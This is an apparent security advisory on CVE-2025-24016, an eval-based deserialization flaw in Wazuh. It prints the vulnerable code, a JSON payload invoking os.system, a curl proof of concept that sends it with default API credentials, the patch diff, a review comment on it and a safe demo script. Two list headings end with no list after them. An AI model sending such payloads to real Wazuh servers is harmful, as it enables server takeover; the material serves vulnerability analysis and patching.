Wazuh, the open-source Security Information and Event Management (SIEM) platform, is affected by CVE-2025-24016, a remote code execution vulnerability in its servers.
An attacker with API access can run arbitrary Python code on a vulnerable server. Versions 4.4.0 through 4.9.0 are affected. The flaw sits in the as_wazuh_object function, which deserializes DistributedAPI (DAPI) request and response data. Successful exploitation yields code execution on the Wazuh server itself, and with it full system takeover, data theft and compromise of the security monitoring infrastructure.
Version 4.9.1 fixes the issue by replacing the unsafe eval call with ast.literal_eval.
CVSS v3.1 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H (base score 9.9, critical)
The security problem resides in the as_wazuh_object function in framework/wazuh/core/cluster/common.py. This function is the JSON deserialization hook for DAPI messages, the data exchanged between the Wazuh API and the manager nodes of a cluster: every JSON object in an incoming DAPI request or response passes through it.
Before the patch, the vulnerable section read as follows:
import datetime
from typing import Dict

# Object hook applied by json.loads() to every JSON object in a DAPI message
def as_wazuh_object(dct: Dict):
    try:
        if '__wazuh_datetime__' in dct:
            return datetime.datetime.fromisoformat(dct['__wazuh_datetime__'])
        elif '__unhandled_exc__' in dct:
            exc_data = dct['__unhandled_exc__']
            # VULNERABLE: eval() on an attacker-controlled string, then a call with attacker-controlled arguments
            return eval(exc_data['__class__'])(*exc_data['__args__'])
        return dct
    except (KeyError, AttributeError):
        return dct
The code checks whether the dictionary dct contains the key __unhandled_exc__. If it does, it reads the __class__ and __args__ values, passes the __class__ string to eval, and calls whatever eval returns with __args__ as positional arguments, the intent being to rebuild an exception object that was raised on another node. Both values come straight from the message, so the sender decides what eval resolves and what gets called.
CVE-2025-24016 exists because eval is applied to the __class__ string of any DAPI object that carries an __unhandled_exc__ entry. eval accepts arbitrary Python expressions, so this is a direct code execution primitive rather than a deserialization routine.
An attacker abuses it by crafting JSON that contains an __unhandled_exc__ dictionary whose __class__ names a callable such as os.system and whose __args__ supplies its arguments. as_wazuh_object never validates or restricts these fields before evaluating them, so the attacker controls both the function that is called and its parameters, and the call runs on the server with the privileges of the Wazuh process.
An attacker can send the following JSON payload:
{
    "__unhandled_exc__": {
        "__class__": "os.system",
        "__args__": ["touch /tmp/pwn.txt"]
    }
}
When as_wazuh_object deserializes this object, eval resolves the string os.system to the function itself and the hook calls os.system("touch /tmp/pwn.txt"), creating the file /tmp/pwn.txt on the Wazuh server.
Exploiting the vulnerability requires valid API credentials (PR:L in the CVSS vector), which an attacker can obtain through a compromised dashboard, weak or default credentials, or, in certain configurations, a compromised agent.
A proof of concept (PoC) delivers the payload through the run_as authentication endpoint of a worker node; the request body is relayed over DAPI, which is where as_wazuh_object deserializes it:
curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" \
    --data '{"__unhandled_exc__":{"__class__": "os.system", "__args__": ["touch /tmp/pwn.txt"]}}' \
    https://<worker-server>:55000/security/user/authenticate/run_as
Explanation of the exploit:
-X POST: sends the request as an HTTP POST.
-k: disables TLS certificate verification, which is convenient for testing against an API that uses a self-signed certificate.
-u "wazuh-wui:MyS3cr37P450r.*-": supplies API credentials. These are the default credentials and should always be changed.
-H "Content-Type: application/json": declares that the request body is JSON.
--data '{"__unhandled_exc__":{"__class__": "os.system", "__args__": ["touch /tmp/pwn.txt"]}}': the malicious body. Once deserialized by as_wazuh_object it runs touch /tmp/pwn.txt on the Wazuh server, demonstrating arbitrary code execution.
https://<worker-server>:55000/security/user/authenticate/run_as: the run_as endpoint. Replace <worker-server> with the hostname or IP address of a Wazuh worker node.
A successful attack grants the following capabilities:
Wazuh resolved this vulnerability in version 4.9.1 by replacing eval with ast.literal_eval, which only parses Python literal syntax and cannot call functions or execute code.
Here is the relevant change in framework/wazuh/core/cluster/common.py:
elif '__unhandled_exc__' in dct:
exc_data = dct['__unhandled_exc__']
- return eval(exc_data['__class__'])(*exc_data['__args__'])
+ exc_dict = {exc_data['__class__']: exc_data['__args__']}
+ return ast.literal_eval(json.dumps(exc_dict))
return dct
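Review bot: two things about the new return path. First, the hook now returns a plain dict of the form {class_name: args} instead of a reconstructed exception instance, so any caller that re-raised the object produced for __unhandled_exc__ will now receive a dict and needs to be updated accordingly. Second, the round trip ast.literal_eval(json.dumps(exc_dict)) raises ValueError whenever __args__ contains a JSON true, false or null (json.dumps emits the tokens true/false/null, which are not Python literals), and ValueError is not covered by the except (KeyError, AttributeError) clause shown in the pre-patch listing, so a malformed or hostile message now escapes the hook instead of being returned as data. Either widen the clause to (KeyError, AttributeError, TypeError, ValueError) or drop the round trip and return exc_dict directly, since its contents already came out of json.loads and are plain data.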
The patch removes the code execution primitive: the __class__ string is no longer handed to eval, and ast.literal_eval accepts only literal structures (strings, numbers, tuples, lists, dicts, sets, booleans and None). A name such as os.system therefore ends up as a dictionary key rather than a function to call, and the hook returns a plain dictionary describing the exception instead of instantiating it.
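To make the before/after difference concrete, the following added example (this is illustrative code, not Wazuh's own) models the hook in its vulnerable and patched forms and drives both through json.loads with an object_hook, the way a DAPI message is decoded. The payloads are constructed for the demonstration: the code-execution payload names os.getpid instead of os.system so the script is safe to run, and a second payload carries a JSON null in __args__ to show that the patched hook raises ValueError there, because json.dumps renders the value as null, which ast.literal_eval does not accept.

```python
"""Added example, not Wazuh code: the DAPI deserialization hook before and after
the 4.9.1 change, exercised through json.loads(..., object_hook=...)."""
import ast
import datetime
import json
import os  # imported so that a payload naming "os.<func>" resolves under eval, as in the real module
from typing import Any, Callable, Dict


def vulnerable_hook(dct: Dict) -> Any:
    """Pre-4.9.1 behaviour: eval() resolves whatever name the sender chose and calls it."""
    try:
        if "__wazuh_datetime__" in dct:
            return datetime.datetime.fromisoformat(dct["__wazuh_datetime__"])
        elif "__unhandled_exc__" in dct:
            exc_data = dct["__unhandled_exc__"]
            return eval(exc_data["__class__"])(*exc_data["__args__"])  # attacker-controlled
        return dct
    except (KeyError, AttributeError):
        return dct


def patched_hook(dct: Dict) -> Any:
    """4.9.1 behaviour: the class/args pair is kept as literal data only."""
    try:
        if "__wazuh_datetime__" in dct:
            return datetime.datetime.fromisoformat(dct["__wazuh_datetime__"])
        elif "__unhandled_exc__" in dct:
            exc_data = dct["__unhandled_exc__"]
            exc_dict = {exc_data["__class__"]: exc_data["__args__"]}
            return ast.literal_eval(json.dumps(exc_dict))
        return dct
    except (KeyError, AttributeError):
        return dct


def decode_dapi_message(raw: str, hook: Callable[[Dict], Any]) -> Any:
    """DAPI-style decode: every JSON object in the message is passed through the hook."""
    return json.loads(raw, object_hook=hook)


# Constructed payload in the shape of the advisory's PoC, but naming a harmless
# function (os.getpid, no arguments) so the demonstration is safe to run.
BENIGN_RCE_PAYLOAD = json.dumps(
    {"__unhandled_exc__": {"__class__": "os.getpid", "__args__": []}}
)

# Constructed payload with a JSON null in __args__. The patched hook serialises it
# back to the token "null", which ast.literal_eval rejects with ValueError.
NULL_ARG_PAYLOAD = json.dumps(
    {"__unhandled_exc__": {"__class__": "ValueError", "__args__": [None]}}
)


def run_vulnerable(raw: str) -> Any:
    """Decode with the pre-patch hook; for BENIGN_RCE_PAYLOAD this executes os.getpid()."""
    return decode_dapi_message(raw, vulnerable_hook)


def run_patched(raw: str) -> Any:
    """Decode with the patched hook; the same payload comes back as {'os.getpid': []}."""
    return decode_dapi_message(raw, patched_hook)


def patched_rejects(raw: str) -> bool:
    """True when the patched hook raises on the message instead of returning data."""
    try:
        decode_dapi_message(raw, patched_hook)
    except (ValueError, TypeError, SyntaxError):
        return True
    return False


if __name__ == "__main__":
    print("vulnerable hook executed os.getpid():", run_vulnerable(BENIGN_RCE_PAYLOAD))
    print("vulnerable hook rebuilt an exception:", repr(run_vulnerable(NULL_ARG_PAYLOAD)))
    print("patched hook returned literal data:", run_patched(BENIGN_RCE_PAYLOAD))
    print("patched hook raises on a null argument:", patched_rejects(NULL_ARG_PAYLOAD))
```

The second payload also shows the legitimate use of the original code path: the vulnerable hook turns it into a ValueError instance (returned, not raised), which is exactly the exception-reconstruction behaviour the eval call was written for, and which the patched hook no longer provides.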
To reduce the risk associated with this vulnerability, organizations should implement the following security measures: